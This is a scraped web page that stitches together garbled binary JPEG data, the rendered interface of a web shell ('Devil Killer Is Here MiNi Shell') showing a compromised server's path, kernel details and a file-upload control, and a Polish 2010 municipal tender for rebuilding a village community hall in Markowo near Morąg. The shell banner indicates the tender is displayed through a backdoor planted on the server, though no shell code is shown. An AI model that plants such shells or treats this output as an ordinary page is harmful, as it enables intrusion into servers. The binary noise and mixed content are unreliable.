JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100311/67662-N-2010.html

<p class="kh_header"><b>Morąg: Remont, rozbudowa i zagospodarowanie terenu wokół świetlicy w Markowie</b><br>
<b>Numer ogłoszenia: 67662 - 2010; data zamieszczenia: 11.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont, rozbudowa i zagospodarowanie terenu wokół świetlicy w Markowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest remont i rozbudowa  budynku świetlicy wiejskiej. Budowa  podziemnego zbiornika na gaz płynny o pojemności V=2700 l z przyłączem gazowym oraz budowa zbiornika bezodpływowego na ścieki na działce nr 11 w miejscowości Markowo gm. Morąg. 
Dane:
Pow. zabudowy		- 187,7 m2		
Pow. użytkowa całkowita	- 131,3 m2		
Kubatura			- 5278,0 m3		
Długość budynku		- 15,04 m
Szerokość budynku		- 10,54 m		
Wysokość w kalenicy	- 8,23 m		
Kategoria poż		- ZL I			
Klasa odporności ogniowej	- B			 
Ilość kondygnacji		- 1	

DANE OGÓLNE

Zaprojektowano budynek parterowy z poddaszem nieużytkowym, niepodpiwniczony, murowany w technologii tradycyjnej z bloczków silka docieplonych 15 cm styropianu. Dach dwuspadowy o kącie 40 stopni  z naczółkami, kryty dachówka ceramiczną.
 W budynku zaprojektowano salę główną świetlicy  dostępną bezpośrednio poprzez wejście główne do budynku. W sali świetlicy zaprojektowano scenę ( posadzka podniesiona o 54 cm w stosunku do posadzki sali), pokój komputerowy i dwa pomieszczenia gospodarcze. Sala  łączy się z komunikacją zaplecza gdzie zaprojektowano  pomieszczenie socjalne oraz sanitariaty. 
Pomieszczenie kotłowni gazowej dostępne jest od strony północnej budynku wejściem indywidualnym. 
Budynek dostępny jest dla osób niepełnosprawnych poprzez pochylnię dla wózków przy wejściu głównym. Wejście główne zadaszone dachem  z dachówki ceramicznej na konstrukcji drewnianej.  Balustrady stalowe z elementami kutymi.

Zagospodarowanie działki
Polega na budowie n/w obiektów (oznaczenia na rysunkach):
	O1	rozbudowa świetlicy wiejskiej
	PZG	zbiornik podziemny na gaz płynny V=2700 dm3 
	SZ	szambo

Uzbrojenie terenu 
a/ Sieć elektryczna - przyłącze istniejące 
b/ Woda - przyłącze istniejące 
c/ Kanalizacja - odprowadzenie ścieków do projektowanego bezodpływowego zbiornika ścieków
e/ Ogrzewanie
 Z kotła gazowego zainstalowanego  w kotłowni 
 f/ Gaz
Zaopatrzenie w gaz ze zbiornika podziemnego na gaz płynny o pojemności  V=2700 dm3 usytuowanego na  działce. 
Przyłącze z PE  fi 32 mm
g/ Ciepła woda
Przygotowanie ciepłej wody użytkowej wspomagane przez instalację Solarną usytuowaną na dachu budynku świetlicy
h) Woda opadowa z terenu parkingu odprowadzona na teren działki poprzez separator.

Drogi i place
Wykonanie nawierzchni zjazdu publicznego o szerokości 3,5m przechodzącego w ciąg pieszo-jezdny a następnie odcinek drogi manewrowej o szerokości 5,00 m z przyległymi 4-ma miejscami postojowymi. 
Teren przed wejściem do budynku (plac, chodnik i 4 miejsca postojowe) wyłożyć kostką betonową w kolorze szarym i grafitowym gr. 8 cm na podbudowie ze żwiru  i podsypce z piasku . Wjazd na działkę z drogi istniejącej wg projektu drogowego. 
Za budynkiem  w północnej stronie działki zaprojektowano skarpę  o nachyleniu 1:2. Skarpę formować i zagęszczać warstwami o grubości 20-30cm, zgodnie z wymaganiami normy BN-72/8932-01.  Skarpę splantować ręcznie i umocnić przez pokrycie ich warstwą humusu o grubości 10cm i obsiać trawą.
Odprowadzenie wód deszczowych z nawierzchni parkingu powierzchniowe poprzez wodociek z dnem z kostki betonowej, prasowanej ograniczonej dwustronnie obrzeżem betonowym 20x6cm a następnie do studni i po przejściu przez piaskownik i separator do obniżenia bagiennego co jest przedmiotem opracowania projektu inst. sanitarnych.

Ogrodzenie
Projektuje się ogrodzić zbiorniki podziemne na gaz płotem z siatki stalowej powlekanej na słupkach stalowych. Ogrodzenie zaopatrzyć w dwie furtki wejściowe na dwóch przeciwległych bokach. Wysokość ogrodzenia 1,80 m.

DANE SZCZEGÓŁOWE

Konstrukcja
Przewidywane roboty rozbiórkowe istniejącego budynku świetlicy wiejskiej.

1)demontaż stropodachu żelbetowego z płyt kanałowych, łącznie z wieńcami żelbetowymi.
2)rozbiórka tylnej ściany podłużnej o grub. 38 cm i ściany szczytowej wschodniej z bloczków gazobetonowych.
3)rozbiórka całkowita tylnej dobudówki murowanej z bloczków gazobetonowych grubości 24 cm.
4)demontaż rampy betonowej załadowczo-wyładowczej przed wejściem frontowym.
5)wyburzenie ścian fundamentowych i ław betonowych zlokalizowanych pod ścianami nośnymi przeznaczonymi do rozbiórki.
6)wyburzenie komina 3-kanałowego murowanego z cegły ceramicznej pełnej.
7)w związku ze zmianą otworów okiennych i drzwiowych w ścianie frontowej i ścianie szczytowej wschodniej oraz brakiem izolacji poziomej fundamentów i ścian, zaleca się rozbiórkę ścian istniejących i przemurowanie ich ponownie do projektowanej wysokości ze zmianą położenia okien.
8)demontaż stolarki, ścianek działowych i posadzek.

Elementy konstrukcji budynku w ramach remontu i rozbudowy.

-Fundamenty pod projektowane ściany nośne przyjęto w postaci ław żelbetowych posadowionych w sposób bezpośredni na podłożu gruntowym (spoistym) na podsypce z pospółki żwirowo piaskowej, zagęszczonej o grubości 10 cm. 
-Ławy z betonu B-20 zbrojone podłużnie 4 O 12 mm stal 34 GS, strzemiona fi 6 mm co 25 cm.
-Ściany fundamentowe, betonowe B-15 lub murowane z bloczków betonowych B-25 o grubości 24 cm na zaprawie cementowej M 10.
-Ściany nośne podłużne i szczytowe - mur z cegły silikatowe silka M24 na zaprawie gotowej cienkiej. 
Nadproża okienne i drzwiowe przyjęto z belek nadprożowych prefabrykowanych L19 odmiany N, po 2 belki w nadproże.
-Projektowany strop nad parterem - żelbetowy monolityczny, płytowo-żebrowy. Płyta wieloprzęsłowa o grubości 8 cm, wsparta na żebrach 2-przęsłowych ciągłych o przekroju 25/25 cm. Beton konstrukcyjny B-20, zbrojenie płyt stalą gładką A-0 oraz żeber stalą 34GS (A-III). W poziomie stropu przyjęto wieńce żelbetowe 25/30 cm zbrojone podłużnie 4 O 12 mm 34GS, strzemiona ? 6mm co 25 cm.
W wieńcu ścian zewnętrznych podłużnych przewiduje się zabetonowanie śrub kotwiących M14, do zamocowania murłat drewnianych.
-Kominy: spalinowy i wentylacyjne.
Komin spalinowy przyjęto z gotowych bloczków kominowych fi160, oraz kominy wentylacyjne z bloczków 2x36/25 cm.
Montaż bloczków wg instrukcji producenta. W poziomie poddasza przewiduje się obudowę kanałów spalinowych i wentylacyjnych.
-Konstrukcja drewniana dachu.
Więźba dachowa drewniana w układzie krokwiowym z kleszczami oraz tężnikiem kalenicowym z grzędą. W szczytach dachu zaprojektowano naczółki, oraz nad gankiem wejściowym daszek dwuspadowy.
Dach o nachyleniu połaci 400 , kryty dachówka ceramiczną holenderką na łatach drewnianych. 
Krokwie sosnowe o przekroju 75/150 mm ustawione w odstępach 0,90 m, kleszcze - 2x50/140 mm.
Przy naczółkach - krokwie narożne 75/150 mm wsparte na słupach wewnętrznych 140/140 mm ustawionych na podwalinach 140/140 mm zakotwionych w stropie żelbetowym.
Murłaty drewniane 125/100 mm zamocowane do wieńców żelbetowych ścian podłużnych, na śruby kotwiące M14 w odstępach a ? 1,35 m.
W miejscu usytuowania drzwi wejściowych do kotłowni utworzono daszek przez wydłużenie 4-ch krokwi o ca 120 cm, z zachowaniem spadku dachu 400 . Końce tych krokwi podparto poziomymi rozporami,  zamocowanymi w murze ściany zewnętrznej. 
-Drewniany daszek nad gankiem.
Daszek 2-spadowy o nachyleniu 400 ,kryty dachówką ceramiczną na deskowaniu ołaconym.
Konstrukcja w układzie krokwiowym z kleszczami w poziomie podpory, oparta na 2 płatwiach. Płatwie 125/125 mm zakotwiono w ścianie zewnętrznej budynku oraz wsparto na słupie zewnętrznym 140/140 mm. Słupy stężono za pomocą drewnianych mieczy połączonych z płatwią w jednym kierunku oraz z kleszczami (jętką) w drugim kierunku.
Słupki drewniane daszku oparto na stopach betonowych za pomocą stalowych podstawek (typowych) osadzonych w betonie.
Więźbę drewniana daszku usztywniono dodatkowo z pomocą tężnika kalenicowego z tzw. grzędą z desek oraz 2 krokwi koszowych zamocowanych do krokwi dachu głównego.

Instalacja elektryczna i alarmowa

- demontaż starej instalacji elektrycznej,
- zasilanie i rozdział energii elektrycznej,
- instalację oświetleniową,
- instalację oświetlenia awaryjnego,
- instalację gniazd wtyczkowych,
- instalację komputerową,
- instalację alarmową,
- instalację telefoniczną,
- instalację ochrony od przepięć atmosferycznych i łączeniowych,
- instalację przeciwporażeniową,
- instalację piorunochronną.

Instalacja c.o.

Kotłownia umiejscowiona będzie w północnej części budynku świetlicy. Kotłownia będzie miała wejście z zewnątrz od strony północnej. Podłoga kotłowni wykonana będzie z materiałów niepalnych i wytrzymałych na zmiany temperatur i uszkodzenia mechaniczne - wylewka z betonu B15 wykończona terakotą lub gresem. Drzwi do kotłowni muszą spełniać warunki p.poż. i być w klasie odporności ogniowej 120 min. oraz otwierać się na zewnątrz pomieszczenia. Strop nad kotłownią będzie zabezpieczony izolacją cieplną. Kotłownia wyposażona będzie w kanał wentylacji nawiewnej o wymiarach 20 x 20 cm z wylotem na wysokości max 5 cm nad posadzką pomieszczenia.  Wentylacja wywiewna grawitacyjna i odprowadzenie spalin gazowych z kotła grzewczego za pośrednictwem przewodu w bloku kominowym.
Naczynie wzbiorcze znajduje się na wyposażeniu kotła grzewczego jako jego integralna część. Pompa obiegowa znajduje się na wyposażeniu kotła grzewczego jako jego integralna część. Ogólne zapotrzebowanie ciepła na cele centralnego ogrzewania, ciepłej wody użytkowej oraz wentylacji wynosi 21 000 W.  
Przyjęto kocioł grzewczy z otwartą komorą spalania Q max  = 24 kW zasilany gazem płynnym propanem.  Parametry czynnika grzejnego 75 o /65 o C. Obieg czynnika grzejnego wymuszony. 

Instalacja gazowa
Zaopatrzenie świetlicy wiejskiej w ciepło odbywać się będzie za pośrednictwem kotła grzewczego projektowanego w pomieszczeniu kotłowni na poziomie przyziemia. 
 kocioł grzewczy jednofunkcyjny z otwartą komorą spalania z palnikiem modulowanym ustawionym na 24 kW. Projektowana instalacja gazowa zasilać będzie również kuchnię gazową 4 - ro palnikową zlokalizowana w pomieszczeniu socjalnym, którą można podłączyć za pośrednictwem elastycznego przewodu z atestem do gazu płynnego. W pomieszczeniu, w którym zlokalizowano kocioł gazowy należy wykonać kanał wentylacji nawiewno - wywiewnej o wymiarach 20 cm x 20 cm bez możliwości zakrycia zamontowany w ścianie wspólnej z garażem na wysokości max 5 cm nad posadzka pomieszczenia kotłowni wyprowadzony kanałem o wym. 20 x 20 cm ze spadkiem max 0,5% w kierunku na zewnątrz budynku i wyprowadzonym nad poziomem terenu. W drzwiach pomieszczenia na kocioł grzewczy, które muszą się otwierać na zewnątrz należy wykonać próg wysokości 8 cm.  W pomieszczeniu kotłowni nie mogą znajdować się żadne kratki ściekowe ani wpusty podłogowe.  Odprowadzenie spalin poprzez komin, który zabezpieczyć wkładem ze stali kwasoodpornej przed destrukcyjnym działaniem spalin. Kanał wywiewny i spalinowy należy poddać próbie ciągu przed zainstalowaniem urządzeń. Przeprowadza się to przez przystawienie łuczywa na odległość 0,1 m od wlotu kanału. Instalacji nie wolno prowadzić przez kanały wentylacyjne, spalinowe, na strychach i pod  podłogami, należy ją montować 0,2 m pod sufitem w miejscach widocznych i łatwo dostępnych.  

Instalacja solarna
Cztery kolektory solarne ustawione kątowo ( 45 O  ) i połączone szeregowo na dachu świetlicy wiejskiej ukierunkowane w kierunku południowym. Ze względu na wysoką wagę własną zestawu kolektorów solarnych wynoszącą około 230 kg należy przewidzieć odpowiednią konstrukcję nośną. 
Izolacja termiczna przewodów musi być wytrzymała na stałą temperaturę w zakresie od - 30 O C do 165 O C ponadto w obrębie dachu musi być odporna na promieniowanie ultrafioletowe i warunki atmosferyczne. 
Izolacje termiczne przewodów rurowych wykonać możliwie bez mostków termicznych, a jej grubość równa lub większa średnicy rury. Dodatkowo w obrębie dachu izolację należy zabezpieczyć przed uszkodzeniami mechanicznymi, pokarmem dla ptaków i wpływem promieni UV - zabezpieczenie wykonać z blachy aluminiowej uszczelnionej silikonem.
Rurociągi technologiczne wykonać z rur stalowych podwójnie ocynkowanych łączonych na gwint uszczelnienie z konopi lub z rur miedzianych łączonych beztopnikowym lutem twardym L-Ag2P lub L-CuP6. Aby zapobiec możliwej cyrkulacji w zasilaniu, zastosować przyłącze termosyfonu, którego pętlę prowadzić ze spadkiem około 10 x średnica rury. 

Instalacja wod.-kan.
Instalację ciepłej wody wykonać należy z rur stalowych podwójnie ocynkowanych. Zadaniem instalacji będzie doprowadzenie  ciepłej wody do armatury czerpalnej. 
Przygotowanie ciepłej wody dla świetlicy wiejskiej odbywać się będzie za pośrednictwem zasobnika c.w.u. zasilanego z kotła grzewczego zasilanego 
gazem płynnym. Jako wspomaganie podgrzewu c.w.u. projektowana jest instalacja solarna wg oddzielnego opracowania. Wszelkiego rodzaju zmiany kierunku rurociągów dokonywać należy przy użyciu kształtek stalowych podwójnie ocynkowanych. Przejścia  projektowanych rurociągów instalacji ciepłej wody przez przegrody budowlane prowadzić należy w tulejach ochronnych, a przestrzeń między nimi uzupełnić pianką poliuretanową. Jako armaturę odcinającą zaprojektowano zawory proste, przelotowe, z metalowym grzybkiem, korpusem podwójnie ocynkowanym i łączonym z rurociągami na gwint. 

Obecnie istniejący budynek wyposażony jest w przyłącze kanalizacyjne za pośrednictwem którego odprowadzane są ścieki do szczelnego zbiornika - 
szambo. Istniejące przyłącze i szambo do likwidacji. Odprowadzenie ścieków gospodarczo - bytowych  z budynku odbywać się będzie poprzez nowe przyłącze kanalizacji sanitarnej do nowego szczelnego zbiornika na ścieki.  
Rurociągi projektowanej kanalizacji sanitarnej ułożonej w ziemi wewnątrz budynku układać ze spadkiem w kierunku odbiornika. Spadki podane są na rysunku nr 1 i 2 projektu. 
 
Przewody ponad posadzką wykonać należy podobnie jak poziomy ułożone w ziemi tzn. z rur  PCV i łączyć metodą wciskową i prowadzić w bruzdach w ścianach.  
Na pionach w ich dolnej części w pomieszczeniach przyziemia tak jak to pokazano na rys. nr 3 projektu montować należy czyszczaki (rewizje)  w celu ewentualnego udrożnienia przewodów w razie zapchania. Piony zakończyć należy ponad dachem rurą wywiewną  PCV dn 110 mm. 
Jako dodatkowe zabezpieczenie projektuje się za syfonami umywalkowymi ( kuchnia i WC męski ) zawory napowietrzające.
Bruzdy oraz rurociągi kanalizacji sanitarnej należy zabudować. 
 
Jako urządzenia sanitarne zaprojektowano : 
zlewozmywak                          - szt. 1, 
zlew                                       - szt. 1, 
umywalki                                - szt. 2 
miski ustępowe ze spłuczką      - szt. 2 
bidet                                       - szt. 1, 
kratki ściekowe                        - szt. 3, 
pisuar                                      - szt. 1. 
 
Wszystkie przybory kanalizacyjne odprowadzające ścieki należy zaopatrzyć w zamknięcia wodne - syfony, które są  niezbędne ze względu na możliwość przedostania się gazów kanałowych do wewnątrz budynku. 

Instalacja zbiornikowa

Przedmiotem inwestycji jest podziemny zbiornik do gazu płynnego propan V = 2.700l ustawiony na płycie fundamentowej wylewanej na terenie budowy z betony B15 gr. 12 cm 
Usytuowanie zbiornika podziemnego stanowiącego zaplecze paliwowe o pojemności zgodnej z zapotrzebowaniem gazu przez Użytkownika wraz z przyłączem gazowym i wymogami ochrony przeciwpożarowej. Zbiornik usytuowany będzie od zachodniej strony świetlicy wiejskiej w odległości od jej ścian zewnętrznych 
2,25 m i 2,0 m od najbliższej granicy posesji. 

Przyłącze kanalizacyjne

Odprowadzenie ścieków gospodarczo - bytowych z budynku odbywać się będzie poprzez projektowane przyłącze  o średnicy 160 mm do szczelnego zbiornika na ścieki - szamba projektowanego na posesji inwestora o pojemności całkowitej V = 10,0 m 3 .
Odcinek przyłącza od budynku do pierwszej studzienki rewizyjnej dn 1200 wykonać należy z rur PCV o średnicy 160 mm i ułożyć na podsypce piaskowej ze spadkiem 2 % w kierunku szamba.  Pozostałą część przyłącza należy wykonać z rur PCV o średnicy 160 mm i spadkiem 15 % w kierunku szamba. 
Zmiany kierunku rurociągu wykonać przy pomocy studzienek rewizyjnych wykonanych z kręgów betonowych o dn 1200 mm wg BN - 86/8971 - 08.  Studzienki posadowić należy na fundamencie Żelbetowym lub płycie drogowej i przykryć przykrywą nadstudzienną żelbetową dn 1400 mm wraz z włazem żeliwnym typu ciężkiego.  Dno studni należy wybetonować, wyprofilować i wykonać kinety.                                           
Ponadto studzienki uzbroić należy w stopnie włazowe i umieścić je na ścianie kręgów od strony włazu co 30 cm w poziomie oraz przemiennie  w pionie.    Zewnętrzne powierzchnie kręgów izolować należy dwukrotnie abizolem lub innym środkiem izolacyjnym. Przyłącze ułożyć należy na podsypce piaskowej oraz przykryć go podsypką gr.20 cm.  
Wszelkiego rodzaju przejścia przez przegrody budowlane przyłącza prowadzić go należy w tulejach ochronnych.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 15 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6, 45.33.11.00-7, 45.33.20.00-3, 45.00.00.00-7, 45.11.12.00-0, 45.33.23.00-6, 45.31.00.00-3, 45.33.30.00-0, 45.11.00.00-1, 45.20.00.00-9, 45.26.00.00-7, 45.42.00.00-7, 45.43.00.00-0, 45.41.00.00-4, 45.54.40.00-3, 45.11.20.00-5, 45.23.32.20-7, 45.23.11.00-6, 45.23.24.00-6, 45.23.31.61-5, 45.11.27.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12 000.00 PLN (słownie:  dwanaście tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności zostanie uznany za spełniony jeżeli Wykonawca wraz z ofertą złoży oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności (zgodnie z załączonym do SIWZ formularzem oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP - Załącznik Nr 6 do SIWZ.
W/w warunek Zamawiający będzie sprawdzał metodą spełnia/nie spełnia na podstawie złożonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru Załącznika nr 4.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych kanalizacyjnych i gazowych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów

- kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny  dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 300 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
Polisa musi być ważna, lub odnawiana przez cały okres realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
